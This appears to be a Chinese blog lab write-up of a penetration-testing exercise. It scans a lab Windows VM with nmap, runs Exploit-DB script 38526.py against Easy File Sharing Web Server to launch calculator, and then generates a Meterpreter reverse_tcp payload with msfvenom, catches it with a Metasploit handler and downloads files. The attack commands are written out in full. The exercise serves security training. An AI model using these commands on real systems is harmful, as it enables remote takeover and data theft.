复现任务A

一、漏洞渗透测试

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。

3、利用该漏洞,使得靶机运行计算器。

实验过程:

1.先将easy file sharing server(efssetup_2018.zip)解压到Windows虚拟机中,然后将port改为8000,在URL的IP后加:8000,最后点击restart即可。

 

2.在kali使用“nmap -sV -A -o easy-file.txt IP”命令实行扫描,可以看到目标靶机运行了easy file sharing服务。

3.输入“searchsploit Easy File Sharing Web Server”搜索可利用的脚本,随机选择一个(此次实验选择了38526.py)。

而后输入“python2 /usr/share/exploitdb/exploits/windows/remote/38526.py 192.168.11.133 8000”即可。

 

4.成功打开Windows的计算器。

 二、Metasploit应用

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

实验过程:

生成被控端:

1.在kali中输入命令“msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.11.132 lport=5000 -f exe -o /var/payload.exe”。

即在var路径下生成payload.exe文件,其中lhost为kali的IP。

 

2.把在kali中生成的payload.exe移到windows虚拟机中。

 

生成主控端:

1.在kali中输入命令“msfconsole”启动Metasploit工具。

 2.输入命令“use exploit/multi/handler”。

3.输入命令“set payload windows/meterpreter/reverse_tcp”。

 4.依次输入命令“set lhost IP”和“set lport 端口”来设置一个lhost和lport,注意此时的IP和端口要与最开始时的msfvenom命令中的IP和端口保持一致。

 

获取靶机控制权: 

 1.输入命令“exploit”开启监听。

 

 2.在Windows中双击文件payload,随后可以看到kali主控端已经连接上了Windows被控端。

 

 

 下载靶机上的文件:

1.输入命令“ls”,查看Windows上的文件。

2.使用命令“download 文件名”即可下载文件。(此时下载的路径为默认路径)

 

 下载在其他路径(图为下载在var路径)。

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值